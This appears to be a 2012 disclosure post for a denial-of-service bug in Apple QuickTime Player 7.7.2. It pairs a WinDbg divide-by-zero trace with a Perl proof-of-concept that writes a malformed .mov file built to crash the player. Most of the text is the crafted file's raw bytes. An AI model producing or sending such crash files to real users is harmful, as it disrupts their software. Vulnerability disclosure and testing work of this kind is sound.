
Apple QuickTime Player 7.7.2 Crash

Posted on 25 October 2012

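#!/usr/bin/perl
#
# Title   : Apple QuickTime Player 7.7.2 Division By Zero
# Version : 7.7.2 (1680.56)
# Date    : 2012-10-23
# Vendor  : http://www.apple.com
# Impact  : Med/High (author's rating; see the note below -- the trace shows
#           a divide-by-zero fault, i.e. denial of service, not memory
#           corruption)
# Contact : coolkaveh [at] rocketmail.com
# Twitter : @coolkaveh
# Tested  : Windows XP SP3 ENG
#
###############################################################################
# Bug
# ---
# Don't forget that exploitable bugs will be published after being patched.
#
# Division by zero during the handling of QuickTime (.mov) files, which
# triggers a denial-of-service condition.  The fault is raised inside
# CoreAudioToolbox.dll at `idiv eax,ecx` with ecx == 0 (exception code
# 0xC0000094, STATUS_INTEGER_DIVIDE_BY_ZERO).  The faulting symbol
# (ACQDesignDecoderEntry) suggests the QDesign Music (QDM2) audio track's
# sample description is what reaches the unchecked divisor -- TODO confirm
# against the decoder, the trace alone does not show which field it is.
#
# NOTE(review): a hardware divide-by-zero exception on x86 does not by itself
# give an attacker control of memory or execution; unless a separate memory
# safety issue is found, treat this as a crash / DoS only.
###############################################################################
# Debugger output (WinDbg):
#   (9fc.dc4): C++ EH exception - code e06d7363 (first chance)
#   (9fc.dc4): C++ EH exception - code e06d7363 (first chance)
#   (9fc.dc4): Integer divide-by-zero - code c0000094 (first chance)
#   First chance exceptions are reported before any exception handling.
#   This exception may be expected and handled.
#   eax=00000800 ebx=06b11490 ecx=00000000 edx=00000000 esi=00000800 edi=01069f80
#   eip=0534499f esp=0013ba24 ebp=00000000 iopl=0  nv up ei ng nz na pe cy
#   cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000  efl=00010287
#   *** ERROR: Symbol file could not be found. Defaulted to export symbols for
#   C:\Program Files\Common Files\Apple\Apple Application Support\CoreAudioToolbox.dll -
#   CoreAudioToolbox!ACQDesignDecoderEntry+0x2114f:
#   0534499f f7f9   idiv eax,ecx
###############################################################################
#
# Usage: perl <this script> [output.mov]
#   Writes the malformed movie to the given path (default: poc.mov in the
#   current directory).  Open the result only inside an isolated test VM;
#   the file is built to crash the player.
#
use strict;
use warnings;

# Raw bytes of the malformed .mov (moov atom first, then free/wide/mdat).
# The `\x` escapes are essential: without the backslashes Perl would emit
# the literal text "x00x00..." and the output would not be a QuickTime file.
my $poc =
    "\x00\x00\x07\xB5\x6D\x6F\x6F\x76\x00\x00\x00\x6C\x6D\x76\x68\x64\x00\x00\x00\x00\xB6\xB6\xFE\x42\xB6" .
    "\xB6\xFE\x43\x00\x00\x02\x58\x00\x00\x0B\xB8\x00\x01\x00\x00\x00\xFF\x00\x00\x00\x00\x00\x00\x00\x00" .
    "\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00" .
    "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x40\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x08\x34" .
    "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x03\x00\x00\x03\xD9\x74\x72\x61\x6B\x00" .
    "\x00\x00\x5C\x74\x6B\x68\x64\x00\x00\x00\x0F\xB6\xA9\x7A\x1B\xB6\xB6\xFE\x43\x00\x00\x00\x01\x00\x00" .
    "\x00\x00\x00\x00\x0B\xB8\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00" .
    "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" .
    "\x00\x00\x00\x00\x40\x00\x00\x00\x00\xBE\x00\x00\x00\xF0\x00\x00\x00\x00\x00\x18\x6C\x6F\x61\x64\x00" .
    "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x01\x00\x00\x00\x00\x24\x65\x64\x74\x73\x00\x00" .
    "\x00\x1C\x65\x6C\x73\x74\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x0B\xB8\x00\x00\x00\x00\x00\x01\x00" .
    "\x00\x00\x00\x03\x2D\x6D\x64\x69\x61\x00\x00\x00\x20\x6D\x64\x68\x64\x00\x00\x00\x00\xB6\xB6\xFE\x42" .
    "\xB6\xB6\xFE\x43\x00\x00\x02\x58\x00\x00\x0B\xB8\x00\x00\x00\x00\x00\x00\x00\x3A\x68\x64\x6C\x72\x00" .
    "\x00\x00\x00\x6D\x68\x6C\x72\x76\x69\x64\x65\x61\x70\x70\x6C\x00\x00\x00\x00\x00\x01\x01\x91\x19\x41" .
    "\x70\x70\x6C\x65\x20\x56\x69\x64\x65\x6F\x20\x4D\x65\x64\x69\x61\x20\x48\x61\x6E\x64\x6C\x65\x72\x00" .
    "\x00\x02\xCB\x6D\x69\x6E\x66\x00\x00\x00\x14\x76\x6D\x68\x64\x00\x00\x00\x01\x00\x40\x80\x00\x80\x00" .
    "\x80\x00\x00\x00\x00\x39\x68\x64\x6C\x72\x00\x00\x00\x00\x64\x68\x6C\x72\x61\x6C\x69\x73\x61\x70\x70" .
    "\x6C\x40\x00\x00\x01\x00\x01\x00\x49\x18\x41\x70\x70\x6C\x65\x20\x41\x6C\x69\x61\x73\x20\x44\x61\x74" .
    "\x61\x20\x48\x61\x6E\x64\x6C\x65\x72\x00\x00\x00\x24\x64\x69\x6E\x66\x00\x00\x00\x1C\x64\x72\x65\x66" .
    "\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x0C\x61\x6C\x69\x73\x00\x00\x00\x01\x00\x00\x02\x52\x73" .
    "\x74\x62\x6C\x00\x00\x00\x66\x73\x74\x73\x64\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x56\x53\x56" .
    "\x51\x31\x00\x00\x00\x00\x00\x00\x00\x01\x00\x02\x00\x18\x53\x56\x69\x73\x00\x00\x03\xFF\x00\x00\x02" .
    "\x00\x00\xBE\x00\xF0\x00\x48\x00\x00\x00\x48\x00\x00\x00\x00\x00\x00\x00\x01\x0E\x53\x6F\x72\x65\x6E" .
    "\x73\x6F\x6E\x20\x56\x69\x64\x65\x6F\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" .
    "\x00\x00\x18\xFF\xFF\x00\x00\x00\x18\x73\x74\x74\x73\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x3C" .
    "\x00\x00\x00\x32\x00\x00\x00\x18\x73\x74\x73\x73\x00\x00\x00\x00\x00\x00\x00\x02\x00\x00\x00\x01\x00" .
    "\x00\x00\x02\x00\x00\x00\x4C\x73\x74\x73\x63\x00\x00\x00\x00\x00\x00\x00\x05\x00\x00\x00\x01\x00\x00" .
    "\x00\x03\x00\x00\x00\x01\x00\x00\x00\x11\x00\x00\x00\x02\x00\x00\x00\x01\x00\x00\x00\x12\x00\x00\x00" .
    "\x03\x00\x00\x00\x01\x00\x00\x00\x13\x00\x00\x00\x01\x00\x00\x00\x01\x00\x00\x00\x14\x00\x00\x00\x03" .
    "\x00\x00\x00\x01\x00\x00\x01\x04\x73\x74\x73\x7A\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x3C\x00" .
    "\x00\x01\x94\x00\x00\x01\xE4\x00\x00\x00\x7C\x00\x00\x00\x44\x00\x00\x00\x44\x00\x00\x00\x60\x00\x00" .
    "\x00\x60\x00\x00\x00\x64\x00\x00\x00\x6C\x00\x00\x00\x70\x00\x00\x00\x88\x00\x00\x00\x44\x00\x00\x00" .
    "\x88\x00\x00\x00\x58\x00\x00\x00\xD0\x00\x00\x01\x2C\x00\x00\x02\x10\x00\x00\x02\xD0\x00\x00\x03\xE4" .
    "\x00\x00\x04\x00\x00\x00\x05\xC8\x00\x00\x06\xE8\x00\x00\x08\x78\x00\x00\x06\x40\x00\x00\x0A\x14\x00" .
    "\x00\x09\x68\x00\x00\x0B\x88\x00\x00\x0A\x1C\x00\x00\x0C\x10\x00\x00\x0A\x20\x00\x00\x10\x4C\x00\x00" .
    "\x0E\x90\x00\x00\x13\x5C\x00\x00\x0E\x80\x00\x00\x0F\x78\x00\x00\x0A\x54\x00\x00\x0C\x3C\x00\x00\x02" .
    "\x84\x00\x00\x06\x74\x00\x00\x01\xF0\x00\x00\x03\x28\x00\x00\x00\xB4\x00\x00\x00\xA4\x00\x00\x00\x9C" .
    "\x00\x00\x00\x88\x00\x00\x00\x3C\x00\x00\x00\x60\x00\x00\x00\x34\x00\x00\x00\x6C\x00\x00\x00\x60\x00" .
    "\x00\x00\x40\x00\x00\x00\x40\x00\x00\x00\x68\x00\x00\x00\x54\x00\x00\x00\x38\x00\x00\x00\x44\x00\x00" .
    "\x00\x60\x00\x00\x00\x40\x00\x00\x00\x3C\x00\x00\x00\x40\x00\x00\x00\x64\x73\x74\x63\x6F\x00\x00\x00" .
    "\x00\x00\x00\x00\x15\x00\x00\x17\xCB\x00\x00\x1B\xBF\x00\x00\x25\x53\x00\x00\x26\x83\x00\x00\x2E\xF9" .
    "\x00\x00\x30\xA9\x00\x00\x3D\xEF\x00\x00\x4B\x9B\x00\x00\x69\xE7\x00\x00\x88\xEB\x00\x00\xB0\x71\x00" .
    "\x00\xE2\xA9\x00\x01\x13\xA1\x00\x01\x28\xD5\x00\x01\x35\xDB\x00\x01\x37\xA3\x00\x01\x3E\x3B\x00\x01" .
    "\x3F\x07\x00\x01\x3F\xEF\x00\x01\x40\x43\x00\x01\x41\x1F\x00\x00\x00\x0C\x75\x64\x74\x61\x00\x00\x00" .
    "\x00\x00\x00\x02\xD7\x74\x72\x61\x6B\x00\x00\x00\x5C\x74\x6B\x68\x64\x00\x00\x00\x0F\xB6\xA9\x7A\x1B" .
    "\xB6\xB6\xFE\x43\x00\x00\x00\x02\x00\x00\x00\x00\x00\x00\x0B\x89\x00\x00\x00\x00\x00\x00\x00\x00\x00" .
    "\x00\x00\x00\x01\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01" .
    "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x40\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" .
    "\x00\x00\x00\x00\x24\x65\x64\x74\x73\x00\x00\x00\x1C\x65\x6C\x73\x74\x00\x00\x00\x00\x00\x00\x00\x01" .
    "\x00\x00\x0B\x89\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x02\x43\x6D\x64\x69\x61\x00\x00\x00\x20\x6D" .
    "\x64\x68\x64\x00\x00\x00\x00\xB6\xB6\xFE\x42\xB6\xB6\xFE\x42\x00\x00\x56\x22\x00\x01\xA8\x00\x00\x00" .
    "\x00\x00\x00\x00\x00\x3A\x68\x64\x6C\x72\x00\x00\x00\x00\x6D\x68\x6C\x72\x73\x6F\x75\x6E\x61\x70\x70" .
    "\x6C\x00\x00\x00\x00\x00\x01\x01\x92\x19\x41\x70\x70\x6C\x65\x20\x53\x6F\x75\x6E\x64\x20\x4D\x65\x64" .
    "\x69\x61\x20\x48\x61\x6E\x64\x6C\x65\x72\x00\x00\x01\xE1\x6D\x69\x6E\x66\x00\x00\x00\x10\x73\x6D\x68" .
    "\x64\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x39\x68\x64\x6C\x72\x00\x00\x00\x00\x64\x68\x6C\x72" .
    "\x61\x6C\x69\x73\x61\x70\x70\x6C\x40\x00\x00\x01\x00\x01\x00\x49\x18\x41\x70\x70\x6C\x65\x20\x41\x6C" .
    "\x69\x61\x73\x20\x44\x61\x74\x61\x20\x48\x61\x6E\x64\x6C\x65\x72\x00\x00\x00\x24\x64\x69\x6E\x66\x00" .
    "\x00\x00\x1C\x64\x72\x65\x66\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x0C\x61\x6C\x69\x73\x00\x00" .
    "\x00\x01\x00\x00\x01\x6C\x73\x74\x62\x6C\x00\x00\x00\x84\x73\x74\x73\x64\x00\x00\x00\x00\x00\x00\x00" .
    "\x01\x00\x00\x00\x74\x51\x44\x4D\x32\x00\x00\x00\x00\x00\x00\x00\x01\x00\x01\x00\x00\x00\x00\x00\x00" .
    "\x00\x02\x00\x10\x00\x00\x00\x00\x56\x22\x00\x00\x00\x00\x08\x00\x00\x00\x00\xB9\x00\x00\x01\x72\x00" .
    "\x00\x00\x02\x00\x00\x00\x40\x77\x61\x76\x65\x00\x00\x00\x0C\x66\x72\x6D\x61\x51\x44\x4D\x32\x00\x00" .
    "\x00\x24\x51\x44\x43\x41\x00\x00\x00\x01\x00\x00\x00\x02\x00\x00\x56\x22\x00\x00\x7D\x00\x00\x00\x08" .
    "\x00\x00\x00\x00\x00\x00\x00\x01\x72\x00\x00\x00\x08\x00\x00\x00\x00\x00\x00\x00\x18\x73\x74\x74\x73" .
    "\x00\x00\x00\x00\x00\x00\x00\x01\x00\x01\xA8\x00\x00\x00\x00\x01\x00\x00\x00\x7C\x73\x74\x73\x63\x00" .
    "\x00\x00\x00\x00\x00\x00\x09\x00\x00\x00\x01\x00\x00\x30\x00\x00\x00\x00\x01\x00\x00\x00\x02\x00\x00" .
    "\x28\x00\x00\x00\x00\x01\x00\x00\x00\x03\x00\x00\x30\x00\x00\x00\x00\x01\x00\x00\x00\x04\x00\x00\x28" .
    "\x00\x00\x00\x00\x01\x00\x00\x00\x06\x00\x00\x30\x00\x00\x00\x00\x01\x00\x00\x00\x07\x00\x00\x28\x00" .
    "\x00\x00\x00\x01\x00\x00\x00\x08\x00\x00\x30\x00\x00\x00\x00\x01\x00\x00\x00\x09\x00\x00\x28\x00\x00" .
    "\x00\x00\x01\x00\x00\x00\x0A\x00\x00\x20\x00\x00\x00\x00\x01\x00\x00\x00\x14\x73\x74\x73\x7A\x00\x00" .
    "\x00\x00\x00\x00\x00\x01\x00\x01\xA8\x00\x00\x00\x00\x38\x73\x74\x63\x6F\x00\x00\x00\x00\x00\x00\x00" .
    "\x0A\x00\x00\x07\xE5\x00\x00\x10\x91\x00\x00\x1C\xA7\x00\x00\x27\xBF\x00\x00\x36\xB5\x00\x00\x61\x3B" .
    "\x00\x00\xA9\x37\x00\x01\x0A\xF5\x00\x01\x2E\xA1\x00\x01\x38\x73\x00\x00\x00\x0C\x75\x64\x74\x61\x00" .
    "\x00\x00\x00\x00\x00\x00\x91\x75\x64\x74\x61\x00\x00\x00\x20\x4D\x43\x50\x53\x4D\x43\x50\x52\x2D\x66" .
    "\x6F\x72\x20\x4D\x61\x63\x69\x6E\x74\x6F\x73\x68\x2D\x35\x2E\x30\x2E\x30\x00\x00\x00\x10\x70\x6C\x61" .
    "\x79\x01\x00\x00\x00\x0C\x57\x4C\x4F\x00\x00\x00\x22\xA9\x6E\x61\x6D\x00\x16\x00\x00\x51\x75\x69\x63" .
    "\x6B\x54\x69\x6D\x65\x20\x53\x61\x6D\x70\x6C\x65\x20\x4D\x6F\x76\x69\x65\x00\x00\x00\x27\xA9\x63\x70" .
    "\x79\x00\x1B\x00\x00\xA9\x20\x41\x70\x70\x6C\x65\x20\x43\x6F\x6D\x70\x75\x74\x65\x72\x2C\x20\x49\x6E" .
    "\x63\x2E\x20\x32\x30\x30\x31\x00\x00\x00\x0C\x57\x4C\x4F\x43\x00\x32\x00\x17\x00\x00\x00\x00\x00\x00" .
    "\x00\x10\x66\x72\x65\x65\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x08\x77\x69\x64\x65\x00\x01\x3A" .
    "\x0E\x6D\x64\x61\x74\x00\x00\x00\x08\x77\x69\x64\x65\x00\x00\x00\x00\x6D\x64\x61\x74\x82\x01\x6F\x17" .
    # --- mdat payload: three 370-byte (0x172, matching the audio stsz) samples,
    #     each a short data prefix followed by zero padding, then a truncated fourth.
    "\x18\x09\x25\xCC\x2F\x93\xF9\x65\x32\xBF\x4C\xE6\x97\xC9\xFC\x32\x99\x5F\x26\xF3\xCB\x64\x7E\x99\xCC" .
    "\x2F\x93\xF9\x65\x32\xBF\x4C\xE6\x97\xC9\xFC\x32\x99\x5F\x26\x16\x01\x16\x15\x01\x55\x14\x01\x55\x13" .
    "\x01\x20\x12\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" .
    "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" .
    "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" .
    "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" .
    "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" .
    "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" .
    "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" .
    "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" .
    "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" .
    "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" .
    "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" .
    "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" .
    "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x82\x01\x6F\x17\x18\x09\x25\xCC\x2F" .
    "\x93\xF9\x65\x32\xBF\x4C\xE6\x97\xC9\xFC\x32\x99\x5F\x26\xF3\xCB\x64\x7E\x99\xCC\x2F\x93\xF9\x65\x32" .
    "\xBF\x4C\xE6\x97\xC9\xFC\x32\x99\x5F\x26\x16\x01\x16\x15\x01\x55\x14\x01\x55\x13\x01\x20\x12\x01\x00" .
    "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" .
    "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" .
    "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" .
    "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" .
    "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" .
    "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" .
    "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" .
    "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" .
    "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" .
    "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" .
    "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" .
    "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" .
    "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x82\x01\x6F\x26\xA8\x09\x25\xCC\x2F\x93\xF9\x65\x32\xBF" .
    "\x4C\xE6\x97\xC9\xFC\x32\x99\x5F\x26\xF3\xCB\x64\x7E\x99\xCC\x2F\x93\xF9\x65\x32\xBF\x4C\xE6\x97\xC9" .
    "\xFC\x32\x99\x5F\x26\x16\x01\x16\x15\x01\x55\x14\x01\x55\x13\x01\x20\x12\x24\xFC\x45\xCC\xEA\x46\xA1" .
    "\x36\x36\x3A\xB7\x2E\x1A\x54\x45\x5B\xD5\x48\x5D\x35\xF2\x4A\x45\xB4\x8A\xA8\x14\xD1\x28\x46\x58\x50" .
    "\x23\x02\xAA\x31\xE5\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" .
    "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" .
    "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" .
    "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" .
    "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" .
    "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" .
    "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" .
    "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" .
    "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" .
    "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" .
    "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" .
    "\x00\x00\x00\x00\x00\x00\x82\x01\x6F\x97\xF2\x09\x3B\x31\x53\x5F\xE1\xB8\xC3\x13\xF5\xE8\xD1\x41\x62" .
    "\xDD\xDD\xD6\xA4\xF5\xE0\x0D";

# Output path: first command-line argument, else the original hard-coded name.
my $out = @ARGV ? $ARGV[0] : 'poc.mov';

# Lexical handle, three-arg open, and every I/O step checked: a silently
# truncated or CRLF-mangled PoC file wastes a repro session.  The ':raw'
# layer keeps the bytes verbatim on Windows.
open(my $fh, '>:raw', $out) or die "Cannot open $out for writing: $!\n";
print {$fh} $poc          or die "Write to $out failed: $!\n";
close($fh)                or die "Close of $out failed: $!\n";

print "Wrote ", length($poc), " bytes to $out\n";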

 
